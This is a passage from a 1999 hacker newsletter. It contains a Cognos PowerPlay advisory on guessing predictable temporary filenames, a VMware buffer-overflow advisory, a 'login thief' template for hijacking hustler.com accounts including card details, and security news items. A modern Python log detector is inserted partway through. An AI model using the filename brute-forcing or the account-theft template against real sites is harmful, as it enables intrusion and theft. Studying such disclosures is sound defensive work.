the same time. Once a successful hit has been made on a temporary file the
user may drill further into the data as described in (a) above.

Alternatively a brute force attack on a server could be attempted by just
submitting requests for all possible filenames. Of course if you could
establish some idea of how long the site has been operational you might
start with 4-char filenames. A very new site with low traffic (if the owner
displays a page counter) might be best approached with 3-char names. This
type of attack would present a beat-the-clock situation as the ~65000
requests (for 4-char) scanned for an existing file before it was purged from
the Temp directory.

(c) ad hoc parameters to the CGI

A variety of parameters to http://www.example.com/cgi-bin/ppdscgi.exe
provide additional information on the PowerPlay server.

 * ?ABOUT= will return the version of PowerPlay.
 * ?TOC (or no parameter) presents a table of contents list of all
   web-enabled cubes on the server. Some sites are using static page links
   to hit cubes rather than relying on PowerPlay's generated TOC. They may
   not be aware that all cubes are available.
 * the hidden parm PPWB in the data contents frame details the unaliased
   location of the temporary directory. e.g.

   <INPUT TYPE="HIDDEN" NAME="PPWB" VALUE="C:/Netscape/SuiteSpot/docs/ppwb">

III. Solution

(a) dynamic directory listing

Turn this feature off on your web server following the directions provided
by the server vendor. If you are unable to disable this feature you may
create an index.html file in the /ppwb/Temp directory that will load when a
filename has not been specified in the URL.

(b) weak temporary filename algorithm

This is really on Cognos' plate. Watch your error logfile for a lot of
failed requests for /ppwb/Temp/*.htm to at least detect an attack. Removing
anonymous cube access may slow an attack.

(c) ad hoc parameters to the CGI

Just be aware of what is available by altering the parameters. Don't assume
your cubes are hidden because there is no direct link to the table of
contents from the web. Password protect your cubes.

DW

APPENDIX A

Here's the output of one subtraction run which shows the v6.5 temporary
filenames and then the hex delta between adjacent filenames:

 Processing test.dat ...
 2161x.htm
 216bx.htm   Ax
 2188x.htm   1Dx
 2192x.htm   Ax
 219cx.htm   Ax
 21a6x.htm   Ax
 21afx.htm   9x
 21b9x.htm   Ax
 21c3x.htm   Ax
 21cdx.htm   Ax
 21d7x.htm   Ax
 21e0x.htm   9x
 21eax.htm   Ax
 21f4x.htm   Ax
 21fex.htm   Ax
 2207x.htm   9x
 2211x.htm   Ax
 221bx.htm   Ax
 2225x.htm   Ax
 222fx.htm   Ax
 2238x.htm   9x
 2242x.htm   Ax
 224cx.htm   Ax
 2256x.htm   Ax
 2260x.htm   Ax
 2269x.htm   9x
 2273x.htm   Ax
 227dx.htm   Ax
 2287x.htm   Ax
 2291x.htm   Ax
 229ax.htm   9x

 SUMMARY
 diff   count
 A    : 23
 1D   : 1
 9    : 6
 out of 31 filenames

Here are some other summaries:

 SUMMARY
 diff   count
 203B : 1
 DF   : 1
 13   : 4
 A    : 10
 14   : 3
 27   : 1
 9    : 1
 out of 22 filenames

 SUMMARY
 diff   count
 3E   : 1
 A    : 19
 9    : 5
 out of 26 filenames

Analysis of filenames created under v6.0 of PowerPlay Web Ed. showed:

 25bx.htm
 25cx.htm   1x
 25dx.htm   1x
 25ex.htm   1x
 25fx.htm   1x
 260x.htm   1x
 261x.htm   1x
 262x.htm   1x
 263x.htm   1x
 264x.htm   1x
 265x.htm   1x
 266x.htm   1x
 267x.htm   1x
 268x.htm   1x
 269x.htm   1x
 26ax.htm   1x
 26bx.htm   1x
 26cx.htm   1x

 SUMMARY
 diff   count
 1    : 17
 out of 18 filenames

 SUMMARY
 diff   count
 37E  : 1
 1    : 491
 out of 493 filenames

 SUMMARY
 diff   count
 1E7  : 1
 1    : 295
 out of 297 filenames

 SUMMARY
 diff   count
 1    : 1255
 out of 1256 filenames

APPENDIX B

 1999-06-10 analysis submitted to Cognos
 1999-06-11 submission acknowledged
 1999-06-18 response from Cognos (below)

-----------------------------
Hello Darin,

Thank you for the descriptive analysis of your problem. I understand that
you have set up anonymous access and therefore you are aware of the security
risk. I agree that the temp file generation is predictable and would suggest
logging an enhancement through our web site. In the interim you have to
weigh what is acceptable in terms of security knowing that there are other
alternatives such as SSL and LDAP. These other options will of course offer
substantially more protection. In conclusion your analysis is correct, now
it is a factor of weighing your security wants and needs.

Regards,
Michael Bockholt
Cognos Support Specialist
Tel: 1-800-637-7447
email: support@cognos.com
-----------------------------

--------------------------------------------------------------------
Darin White
d.w@ibm.net
--------------------------------------------------------------------

@HWA

06.0 VMware Security Alert
~~~~~~~~~~~~~~~~~~~~~

Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/

Date: Fri, 25 Jun 1999 19:18:35 -0700
From: Jason R. Rhoads
To: BUGTRAQ@netspace.org
Subject: VMware Security Alert

"On June 22nd, 1999, VMware, Inc. was notified of a security problem with
VMware for Linux 1.0.1. This security hole is also present in all previous
versions of VMware for Linux. The security hole has been fixed in VMware for
Linux 1.0.2 released today.
The security hole allows a buffer overrun attack against VMware for Linux to
result in unprivileged root access to a machine. An updated version of VMware
for Linux which fixes this problem is available now, see below. As far as we
know, this breach has never been used for malicious purposes, or caused any
harm to customer installations. VMware, Inc. apologizes for the inconvenience
to our users."

http://www.vmware.com/news/security.html

-----------------------------------------------------------------------------

VMware Security Alert

Date: June 25th, 1999

On June 22nd, 1999, VMware, Inc. was notified of a security problem with
VMware for Linux 1.0.1. This security hole is also present in all previous
versions of VMware for Linux. The security hole has been fixed in VMware for
Linux 1.0.2 released today.

The security hole allows a buffer overrun attack against VMware for Linux to
result in unprivileged root access to a machine. An updated version of VMware
for Linux which fixes this problem is available now, see below. As far as we
know, this breach has never been used for malicious purposes, or caused any
harm to customer installations. VMware, Inc. apologizes for the inconvenience
to our users.

Vulnerable Systems

The security hole allows an attack to occur during VMware startup, but before
a virtual machine is powered on. Guest operating systems themselves are
unlikely to be affected by these buffer overflow attacks.

Systems most vulnerable to this attack are multi-user Linux systems that have
VMware installed. A malicious user with access to an account on the system
could exploit the hole. Stand alone single-user machines are not at high risk
from this security hole. This hole does not allow direct network based 'worm'
style attacks against VMware.

This security hole was discovered by Asylum Security, a division of
CyberSpace 2000, a professional computer security response team. VMware has
taken immediate action in response to this event. VMware for Linux 1.0.2 was
made available for download on June 25th, 1999 on our web site and mirror
sites. The shipment of CD-ROMs has been suspended and the inventory
discarded. Customers who have purchased VMware for Linux have been notified
by electronic mail, VMware has also posted security alerts to newsgroups at
news.vmware.com.

Affected VMware Releases

This security hole is present in VMware for Linux 1.0.1 and all previous
versions, including the beta versions (build-106, build-135, build-152) and
the experimental version (build-179). VMware recommends that users replace
beta and experimental versions with VMware for Linux 1.0.2. An updated VMware
for Linux experimental release with fixes for this security hole will be made
available in the near future.

How to Close this Security Hole

The security hole can be closed by simply upgrading to VMware for Linux
version 1.0.2:

 1. Download VMware for Linux 1.0.2 from one of our mirror sites
 2. Untar the distribution.
        tar zxvf vmware-1.0.2.tar.gz
 3. Change directory to vmware-install
        cd vmware-install
 4. As root, install VMware for Linux
        su
        ./install.pl

You will first be asked whether you want to upgrade VMware for Linux. Simply
answer yes at this point and then follow any installer instructions.

NOTE: It is not possible to resolve this security problem by removing suid
(Set User ID) root privileges from the VMware executable. VMware must be suid
root to run correctly.

Reporting Security Issues

VMware is committed to addressing security issues and providing customers
with information on how they can protect themselves. If you identify what you
believe may be a security issue with a VMware product, please send an email
to security@vmware.com. We will work to appropriately address and communicate
the issue.

Notification of Security Alerts

When VMware becomes aware of a security issue that significantly affects our
products, we will take action to notify affected customers. Typically this
notification will be in the form of a security bulletin explaining the issue,
and where possible a response to the problem. These bulletins will both be
emailed to affected customers and posted on our web site and newsgroups at
news.vmware.com.

-----------------------------------------------------------------------------

Date: Sat, 26 Jun 1999 17:33:22 -0400
From: Don
To: BUGTRAQ@netspace.org
Subject: VMWare Advisory - buffer overflows

This advisory was made on 06/21/99 and was to be released on 06/28/99 (or
after a fix was released). We would like to recognize the VMware staff and
their responsiveness to the bug reports. Last night, customers who purchased
their product received notices to upgrade to VMware v1.0.2.

For more information on the VMware bugs, visit:

 http://www.vmware.com/news/security.html
 http://www.cyberspace2000.com/security/advisories

-Don Sausa
----------[asylum security]------------
id: #99021, team director
e-mail: don@cyberspace2000.com
web: http://cyberspace2000.com/security
---------------------------------------

Team Asylum Security
Copyright (c) 1999 By CyberSpace 2000
http://www.cyberspace2000.com/security

Source: Seth L. [seth@cyberspace2000.com]
Advisory Date: 06/21/99
Release Date: 06/28/99 [ Final Revision: 06/25/99 ]

Affected
--------
VMware v1.0.1 and earlier for Linux.

Product Description
-------------------
VMware v1.0.1 is a software product by VMware, Inc. that creates a virtual
machine in which you can install multiple operating systems without
repartitioning or formatting your hard drive.

Vulnerability Summary
---------------------
Team Asylum has found multiple buffer overflows existing in VMware v1.0.1
for Linux. Earlier versions also have the same buffer overflows. VMware Inc.
has been notified of these overflows and they have released VMware v1.0.2 as
a fix. Any local user can exploit these overflows to gain root access.

Fix
---
All users are encouraged to upgrade to VMware v1.0.2.
You may download it directly off http://www.vmware.com.

Special Thanks
--------------
Special thanks to VMware staff for responding quickly to our bug reports.
Within 3 days, they have managed to fix the overflows, as well as stop the
physical distribution of their v1.0.1 product. All customers who have
purchased VMware have been notified as of 06/25/99 12:00 midnight (PST)
about the new VMware v1.0.2 version.

@HWA

07.0 Security vulnerability in hustler.com login template
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/

security vulnerability in hustler.com which allows any user to steal
another user's account and gain full access to their account including cc#
information. no fix yet. hustler.com has been informed.

----------------------------------------------------------------------------
exploit template
----------------------------------------------------------------------------
[HTML form; only its visible text is reproduced here]

HUSTLER LOGIN THIEF BY EGODEATH
HACKED

Change My Password - ego's M0D1Fi3D verzi0n

Highlight the User ID:
This is the hustler account thief script. In order for this to work you
must know someone's real login name (if it's an old carded account with a
nick like XTC, give up, you can't steal a frozen account, but yea.. u can
change its password...)

Enter Your New Password
Enter Password again
@HWA

08.0 DOD investigating computer 'Mob-like' tactics
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: Federal Computer Week; http://www.fcw.com/pubs/fcw/fcwhome.htm

JUNE 30, 1999 . . . 12:25 EDT

DOD investigating computer 'mob tactics'

BY DANIEL VERTON (dan_verton@fcw.com)

While a senior adviser to the Defense Department testified before Congress
this week on threats to national security stemming from the export of
powerful computer technology, his supervisor allegedly attempted to access
and tamper with his computer, prompting the immediate launch of a full-scale
investigation.

Rep. Dan Burton (R-Ind.), chairman of the House Government Reform Committee,
said Jay Davis, director of the Defense Threat Reduction Agency, informed the
committee on June 28 that an investigation was under way into an incident
involving unauthorized access to the computer belonging to a senior
strategic trade adviser to the agency.

According to Burton, the incident took place while Peter Leitner, a longtime
internal critic of DOD's policy on exporting sensitive computer
technologies, was testifying on June 24 before the committee regarding
security problems stemming from that policy.

Although no details from the investigation have been released yet, Burton
claims that the incident is an example of DOD officials trying to strong-arm
a congressional witness into not cooperating with the committee.

"While Dr. Leitner was telling my committee about the retaliation he
suffered for bringing his concerns to his superiors and Congress, his
supervisor was trying to secretly access his computer," Burton said. "This
smacks of mob tactics. Congress will not stand for this kind of witness
intimidation."

Although DTRA has launched an investigation into the incident, Burton said
he plans to call upon Defense Secretary William Cohen to ask for "his
personal involvement" in the case. "I intend to ask a lot of questions of
the Defense Department officials involved, and I expect to get straight
answers," Burton said.

Leitner has criticized the department's policy of easing export controls on
powerful computer technology that is used to simulate and test the
reliability of nuclear weapons, claiming that the acquisition of
supercomputer technology abroad was feeding a new form of Cold War
characterized by an arms race for "virtual weapons."

@HWA

09.0 GSA announces Intrusion Detection Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: Federal Computer Week; http://www.fcw.com/pubs/fcw/fcwhome.htm

JUNE 28, 1999

GSA launches intrusion-detection net

BY DIANE FRANK (diane_frank@fcw.com)

The General Services Administration last week asked industry for
information about emerging security technology for detecting unauthorized
users on agency networks, with the goal of building a government
intrusion-detection system by the end of next year.

In building the Federal Intrusion Detection Network (Fidnet), GSA hopes to
find security tools vendors are developing that overcome the weaknesses of
existing technology. By keeping ahead of the latest technology, GSA hopes to
leave agency defenses less vulnerable to hackers, agency officials said.

"We want to encourage people to develop new technologies that will help us
keep neck and neck with the perpetrator," said David Jarrell, program
manager for the GSA portion of Fidnet in the Federal Technology Service's
Office of Information Security and technical director of the Federal
Computer Incident Response Capability.

OIS will look not only to established intrusion-detection vendors but to new
companies and people that "we haven't even heard of," Jarrell said. "I think
there are people out there that are significantly brilliant enough to solve
this and we hope that this [request for information] will cause them to come
forward," he said.

GSA plans to use the vendor-provided information to develop prototypes by
the first quarter of fiscal 2000, said Tom Burke, GSA's assistant
commissioner of information security. Down the line, OIS may even pay some
of the vendors to put together a long-term, real-world demonstration of
their capabilities at an agency, he said.

GSA particularly is interested in finding intrusion-detection systems that
are more capable of detecting attacks as they happen instead of after the
fact. The problem is that most intrusion-detection solutions work the same
way anti-virus protection does: They check network-use patterns against a
known list of intrusion "signatures" and send out alerts when they come
across a match. But as vendors and users have known for years, this method
will not catch intrusions that are not on that list. Also, most products
just now are advancing to the point where they alert administrators at the
time an intrusion takes place.

"We find that many of the off-the-shelf products that are available today
are really a response to the intrusions, and they are always a step behind
the intruder," Jarrell said. "We want to look to the future and some
artificial intelligence that will learn as it goes about the attacks that
are being launched."

This type of capability would be more than welcome to agencies, especially
if they are enabled to respond more quickly at the local level, said one
senior civilian agency official. Others recognized the potential benefits of
sharing attack "experience" across government.

"What I would hope this next-generation intrusion detection could bring to
us is the capability not only to monitor [intrusions] but to put together
the information in a history for reference," said Sarah Jane League, Defense
Department liaison at the Critical Infrastructure Assurance Office. "It
should bring that pattern recognition and learn as it goes...so that over
time it will have the ability to recognize" not only attacks but what could
be attacks, she said.

Vendors have been working on this type of product, sometimes called anomaly
detection, for some time. "ISS has a lot of research efforts in place to
advance the intrusion-detection market," said Mark Wood, intrusion-detection
product manager at Internet Security Systems Inc., maker of the Real-Secure
intrusion-detection product line. "Having a pre-defined list of signatures
is nice, but you'd like to detect novel attacks, things you don't know
about."

One major problem vendors are struggling with in producing this type of
solution is the large number of "false positives" -- incorrectly perceived
attacks -- that are generated when a network is scanned, Wood said. Despite
this, a commercially viable solution could be available within the next
year, he said.

"It's certainly worthwhile that someone like the GSA is driving this; it's
absolutely necessary," Wood said. "Perhaps this will help coordinate the
industry so that they will provide something sooner than they would have."

The need for this type of solution across government has been underscored by
the more than 40 federal World Wide Web sites that have been hacked in the
last two months, including at least six last week. And these attacks are
only the most noticeable types of intrusions into government networks,
according to federal experts testifying before Congress last week [see
related story, "House member suggests regular network security reports"].

However, in the end, while many would wish otherwise, keeping up with
attackers instead of one step behind really is the best that anyone can do,
Jarrell said. "There is no silver bullet; there is no perfect solution when
it comes to intrusion detection," he said. "As I've said before, if you
build a better mousetrap, a better mouse will evolve."
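The log-watching advice in the Cognos advisory (section 05.0, Solution (b): watch the error log for a run of failed requests for /ppwb/Temp/*.htm) and the signature-versus-anomaly distinction in the GSA piece above are two sides of the same detection problem, so here is one added example, code from neither source, that runs both kinds of rule over a handful of constructed Common Log Format lines. The addresses, timestamps and most paths are made up for the example; the /ppwb/Temp/ filenames are the ones printed in the advisory's appendix. The signature rule fires only on the pattern it was written for; the second rule, a crude stand-in for anomaly detection that flags any client whose error ratio is far above normal, also catches a client guessing other document names, and shows the false positive the article warns about by flagging a harmless client following three stale bookmarks.

```python
import re
from collections import Counter

# Constructed Common Log Format sample (not real traffic). The
# /ppwb/Temp/ names are the ones the advisory lists; the addresses,
# timestamps and other paths are invented for the example.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jun/1999:09:17:01 -0400] "GET /cgi-bin/ppdscgi.exe?TOC HTTP/1.0" 200 5120
10.0.0.5 - - [28/Jun/1999:09:17:04 -0400] "GET /ppwb/Temp/1ad6t.htm HTTP/1.0" 200 17904
10.0.0.5 - - [28/Jun/1999:09:17:04 -0400] "GET /ppwb/Temp/1ad6x.htm HTTP/1.0" 200 37828
10.0.0.6 - - [28/Jun/1999:09:18:10 -0400] "GET /ppwb/ HTTP/1.0" 200 2048
10.0.0.6 - - [28/Jun/1999:09:18:11 -0400] "GET /images/logo.gif HTTP/1.0" 200 940
10.0.0.6 - - [28/Jun/1999:09:18:11 -0400] "GET /images/missing.gif HTTP/1.0" 404 312
10.0.0.9 - - [28/Jun/1999:09:19:00 -0400] "GET / HTTP/1.0" 200 1800
10.0.0.9 - - [28/Jun/1999:09:19:02 -0400] "GET /reports/q1.htm HTTP/1.0" 404 312
10.0.0.9 - - [28/Jun/1999:09:19:03 -0400] "GET /reports/q2.htm HTTP/1.0" 404 312
10.0.0.9 - - [28/Jun/1999:09:19:04 -0400] "GET /reports/q3.htm HTTP/1.0" 404 312
192.0.2.10 - - [28/Jun/1999:09:20:00 -0400] "GET /ppwb/Temp/2161x.htm HTTP/1.0" 404 312
192.0.2.10 - - [28/Jun/1999:09:20:00 -0400] "GET /ppwb/Temp/216bx.htm HTTP/1.0" 404 312
192.0.2.10 - - [28/Jun/1999:09:20:01 -0400] "GET /ppwb/Temp/2188x.htm HTTP/1.0" 404 312
192.0.2.10 - - [28/Jun/1999:09:20:01 -0400] "GET /ppwb/Temp/2192x.htm HTTP/1.0" 404 312
192.0.2.10 - - [28/Jun/1999:09:20:02 -0400] "GET /ppwb/Temp/219cx.htm HTTP/1.0" 404 312
192.0.2.10 - - [28/Jun/1999:09:20:02 -0400] "GET /ppwb/Temp/21a6x.htm HTTP/1.0" 404 312
192.0.2.10 - - [28/Jun/1999:09:20:03 -0400] "GET /ppwb/Temp/21afx.htm HTTP/1.0" 404 312
192.0.2.10 - - [28/Jun/1999:09:20:03 -0400] "GET /ppwb/Temp/21b9x.htm HTTP/1.0" 404 312
198.51.100.7 - - [28/Jun/1999:09:21:00 -0400] "GET /sales.htm HTTP/1.0" 404 312
198.51.100.7 - - [28/Jun/1999:09:21:00 -0400] "GET /finance.htm HTTP/1.0" 404 312
198.51.100.7 - - [28/Jun/1999:09:21:01 -0400] "GET /hr.htm HTTP/1.0" 404 312
198.51.100.7 - - [28/Jun/1999:09:21:01 -0400] "GET /budget.htm HTTP/1.0" 404 312
198.51.100.7 - - [28/Jun/1999:09:21:02 -0400] "GET /payroll.htm HTTP/1.0" 404 312
198.51.100.7 - - [28/Jun/1999:09:21:02 -0400] "GET /audit.htm HTTP/1.0" 404 312
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Signature taken from the advisory's advice: a burst of failed requests
# for the temporary cube files means somebody is guessing filenames.
TEMP_FILE_RE = re.compile(r'^/ppwb/Temp/[0-9a-fA-F]+[xt]\.htm$')
SIGNATURE_THRESHOLD = 5   # failed /ppwb/Temp/ requests per client before alerting


def parse_clf(line):
    """Parse one CLF line into a dict, or return None if it is malformed."""
    m = CLF_RE.match(line.strip())
    if m is None:
        return None
    return {"ip": m["ip"], "path": m["path"], "status": int(m["status"])}


def parse_log(text):
    """Parse every well-formed line; malformed lines are skipped, not fatal."""
    events = (parse_clf(line) for line in text.splitlines())
    return [e for e in events if e is not None]


def signature_alerts(events, threshold=SIGNATURE_THRESHOLD):
    """Clients with >= threshold 404s for /ppwb/Temp/*.htm -> {ip: count}."""
    hits = Counter(e["ip"] for e in events
                   if e["status"] == 404 and TEMP_FILE_RE.match(e["path"]))
    return {ip: n for ip, n in hits.items() if n >= threshold}


def anomaly_alerts(events, min_requests=3, max_error_ratio=0.5):
    """Clients whose share of 4xx/5xx responses is abnormally high -> {ip: ratio}.

    Knows nothing about PowerPlay, so it also flags a client guessing other
    document names, at the price of flagging a legitimate client with stale
    bookmarks (the false positives the article mentions).
    """
    total = Counter(e["ip"] for e in events)
    errors = Counter(e["ip"] for e in events if e["status"] >= 400)
    flagged = {}
    for ip, n in total.items():
        if n < min_requests:          # too little traffic to judge
            continue
        ratio = errors[ip] / n
        if ratio > max_error_ratio:
            flagged[ip] = round(ratio, 2)
    return flagged


def main():
    events = parse_log(SAMPLE_LOG)
    print("signature alerts:", signature_alerts(events))
    print("anomaly alerts:  ", anomaly_alerts(events))


if __name__ == "__main__":
    main()
```

Run against the sample, the signature rule names only 192.0.2.10 (eight guessed /ppwb/Temp/ names), while the error-ratio rule names 192.0.2.10, 198.51.100.7 and, wrongly, 10.0.0.9; tuning `max_error_ratio` and `min_requests` is exactly the signal-versus-noise trade the article describes, and in practice the two rules are run together so that a signature hit carries the confidence and the anomaly rule carries the coverage.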
@HWA 10.0 Nasa servers reportedly hacked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.newsbytes.com/pubNews/132718.html 30 Jun 1999, 10:51 AM CST By David McGuire, Newsbytes. MINNEAPOLIS, MINNESOTA, U.S.A., . In what appears to be the third computer attack on a government Website this week, crackers may have gained unauthorized access to one or more National Aeronautics and Space Administration (NASA) servers yesterday. "There is some indication that a couple servers at the Marshal Space Flight Center in Huntsville, Alabama" were attacked earlier this week, a NASA spokesperson told Newsbytes today. NASA could not confirm the reports as of this writing. The Marshall site was up and running as of 11:00 EDT today. While Sunday's hack of the US Army's home page typifies the kind of high-profile attack favored by many hacker (more accurately known as cracker) groups, the apparent Marshal attack and yesterday's crack of National Oceanic and Atmospheric Administration's (NOAA) Norman, Okla.-based Storm Prediction Center are more puzzling, Newsbytes notes. Marshall is a fairly low-profile NASA center that focuses primarily on research in the areas of astronomy, low gravity, and space shuttle propulsion. The Storm Prediction Center (SPC) provides nationwide weather forecasts. The SPC hack caught NOAA by surprise. "At about three AM, some Internet customer called one of our forecasters and said 'You better check your Website,'" SPC Director Joe Schaefer told Newsbytes yesterday. "We produce weather forecasts for the whole country," he said. "We are doing a public good. There is no way I can see that we are harming anybody. To come after a site like this is strange, to put it mildly." The Army hack was somewhat more typical. At some point Sunday night, crackers replaced the Army's home page with a page that read "Hello, this Website hack has a purpose. The purpose is to settle rumors. Global Hell is alive, Global Hell will not die," Lt. Col. 
Ron Burns of the Army's Director for Information Systems Command, Control, Communications and Computers (DISC4) unit told Newsbytes Monday. Sunday's attack was the first successful crack of the Army's main site, located at http://www4.army.mil . The US Senate and Federal Bureau of Investigation (FBI) have also suffered recent Website attacks. The FBI declined comment on the string of hacker attacks. Reported by Newsbytes.com, http://www.newsbytes.com . 10:51 CST Reposted 10:59 CST @HWA 11.0 UK May Force ISPs to Install Taps ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN http://www.hackernews.com/ contributed by Weld Pond The British Interception of Communications Act has been the target of proposed changes recently. The changes would require all communications service providers to build in, at their expense, capabilities for government agents to be able to listen in to communications. This proposal is particularly broad as it does not stop at the internet and covers everything from pagers to video conferencing to VPNs. Theses new requirements have been proposed by the International Law Enforcement Telecommunications Seminar (ILETS)an exclusive FBI funded group that meets in secret. Tech Web http://www.techweb.com/news/story/TWB19990625S0019 U.K. Wants ISPs To Build In Interception (06/25/99, 3:40 p.m. ET) By Duncan Campbell, TechWeb The British government has become the first in Europe to openly propose internationally agreed requirements for ISPs to build technology into networks that would allow for police surveillance. Under proposals for changes to the Interception of Communications Act announced by the Home Office this week, all communications service providers (CSPs) would be required to build interception software or hardware into their systems. The law -- if passed -- will apply to all types of new communications services, including Internet telephony, TV conferencing, paging, and satellite based personal communications systems. 
The International User Requirements have been drawn up over the past six years by a group founded by the U.S. FBI, called the International Law Enforcement Telecommunications Seminar (ILETS), which meets in secret. The group excludes representatives from industry or civil rights organizations, and has attempted to standardize its objectives as an International Telecommunication Union requirement. According to this week's "white paper," every type of network will be covered, including VPNsoperated through the Internet or other TCP/IP systems. The new law will also cover interception of business telecom services, ranging from basic networks of a few lines found within a small office to large networks linking offices, in both the public and private sectors, the document says. Under the present British Interception of Communications Act, only licensed public telecom operators have to provide government tapping facilities within their networks. However, ISPs must surrender any stored communications data they have, including e-mail, Web-access records, and service details, if served with an order. Home Secretary Jack Straw now proposes all CSPs be required to take reasonable steps to ensure their system is capable of being intercepted. "This will be an ongoing requirement CSPs will have to consider each time they develop their network or introduce new services," Straw said. "CSPs will also be required to provide reasonable assistance to effect warranted intercepts." This will include real-time access to data about their subscribers and information about services they have used, including logs of telephone calls, e-mail, or website accesses. A key part of technical arrangements to be made will ensure operators will not be able to know what information has been copied from their systems. The British government said the new law would make full provision for human-rights legislation, Straw said. 
But according to Madeleine Colvin of Justice, the international human-rights organization and British section of the International Commission of Jurists, the proposed law would not achieve this. "There are major gaps in what these proposals suggest for controlling surveillance methods. For example, how is anyone to know if their human rights may have been abused if they are never going to be told that their e-mail has been intercepted by the government?" he asked.

@HWA

12.0 Crypto Tie Downs Loosened
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 28th

From HNN http://www.hackernews.com/

contributed by mortel

Bills to loosen the restrictions on exporting strong encryption were approved on Thursday by the U.S. Senate and House Commerce Committees. The House Security and Freedom through Encryption (SAFE) Act removes the government restrictions on export of strong encryption if a comparable encryption product is commercially available outside the U.S. In addition, the SAFE Act bars the government from requiring key recovery. Yeah!

CNN
http://www.cnn.com/TECH/computing/9906/25/cryptbill.idg/

U.S. committees approve encryption bill
by Elinor Mills Abreu
From...

(IDG) -- The U.S. Senate and House Commerce Committees Thursday approved bills that would liberalize encryption export regulations. In addition, the Senate committee passed bills calling for the promotion of digital signatures and filtering software to block pornography.

The House Security and Freedom through Encryption (SAFE) Act removes the government restrictions on export of strong encryption if a comparable encryption product is commercially available outside the U.S. In addition, the SAFE Act bars the government from requiring key recovery, whereby the government would have access to keys to decode encrypted messages for law-enforcement purposes.

The government argues that it needs to control the export of strong encryption for national security.
Vendors argue that the restrictions hamper their competitiveness on the worldwide market because strong encryption is readily available outside the U.S. The government wants vendors to develop encryption software that includes a key recovery mechanism.

The amendments approved by the House committee would do several things:

- require that a comparable encryption product be available in a country outside the U.S. in order for a U.S. company to export similar technology there;
- bar export to the People's Liberation Army or the Communist Military in China;
- allow the Secretary of Commerce to deny the export of encryption products if they would be used to harm national security, to sexually exploit children or to execute other illegal activities;
- require the Secretary of Commerce to consult with the secretaries of State and Defense, the Director of Central Intelligence and the Attorney General when reviewing a product; and
- subject a person to criminal penalties for not providing access to encrypted data if a subpoena were served and the person had the capability to decrypt the data.

Meanwhile, Sen. John McCain [R-Ariz.] proposed a Senate encryption bill that would allow for the exportation of encryption of key lengths up to 64 bits. In general, companies currently must get a license to export encryption higher than 56 bits in key length.

In addition, the McCain encryption bill would allow for the export of stronger "nondefense" encryption to "responsible entities" and governments in the North Atlantic Treaty Organization, the Association of Southeast Asian Nations and the Organization for Economic Cooperation and Development. However, the Secretary of Commerce would be allowed to prohibit export of particular encryption products to an individual or organization in a foreign country.
An Encryption Export Advisory Board would be created to review applications for exemption of encryption of over 64 bits, make recommendations to the Secretary of Commerce and authorize more funding to law enforcement and national security agencies to "upgrade facilities and intelligence." The bill would ask the National Institute of Standards and Technology to establish an advanced encryption standard by Jan. 1, 2002.

"The bill carefully balances our national security and law enforcement interests while updating current laws on encryption technology," McCain said in a statement. "It is illogical to deny U.S. producers the ability to compete globally if similar products are already being offered by foreign companies."

On the digital signature front, Sen. Spencer Abraham [R-Mich.] said the Millennium Digital Commerce Act he sponsored would "ensure that individuals and organizations in different states are held to their agreements and obligations even if their respective states have different rules concerning electronically signed documents." The Abraham bill would pre-empt state law from denying that digital contracts are legal solely because they are in electronic form; establish guidelines for international use of electronic signatures that would remove obstacles to electronic transactions; and allow the market to determine the type of authentication technology used in international commerce.

The Senate Commerce Committee also grappled with Internet censorship by approving another McCain-sponsored bill. The plan would require schools and libraries receiving government universal service discounts for Internet access to use filtering technology on computers children access that would screen out pornography.

Taking up a less controversial bill, the Senate committee also approved a measure to tie cellular phone users calling 911 to medical centers, police and firefighters for faster response time to accidents and emergencies.
The bill would expand the coverage areas of wireless telephone service; establish parity of protection for the provision or use of wireless 911 service; and upgrade 911 systems so they can provide information such as location and automatic crash notification data.

Alan Davidson, staff counsel for the Washington, D.C.-based Center for Democracy and Technology, said "it was a mixed day for the Internet on Capitol Hill." While legislators realize the potential of electronic commerce and favor liberalizing encryption export to advance it, they are fearful of what they see as the "dark side" of the Internet - content that might be objectionable, according to Davidson.

Rather than require filtering software in schools and libraries, legislators should offer educational institutions the flexibility to choose "acceptable use or monitoring policies," he said. "Mandating that every school and library filter access to the Internet is not going to be the best way to protect kids," he said. "In addition to the fact that the bill has constitutional problems, it mandates one technological approach without regard to the more effective ways that local communities are already protecting kids."

Other committees may review these bills before they go to the floor of the two houses for a vote, he said.

@HWA

13.0 Heathen.A Spreads Through Word Files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 28th

From HNN http://www.hackernews.com/

contributed by nvirb

While not intentionally malicious, nor as fast-spreading as Melissa or WormExplorer, Heathen.A is the latest threat to computer users. Heathen.A is considered a multipartite virus and only infects Word97 files.

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11586,00.html

Heathen.A Is at the Gates
Keep a lookout: There's a new bug in town.
by Matthew Nelson, InfoWorld Electric
June 25, 1999, 4:50 p.m. PT

SAN MATEO, CALI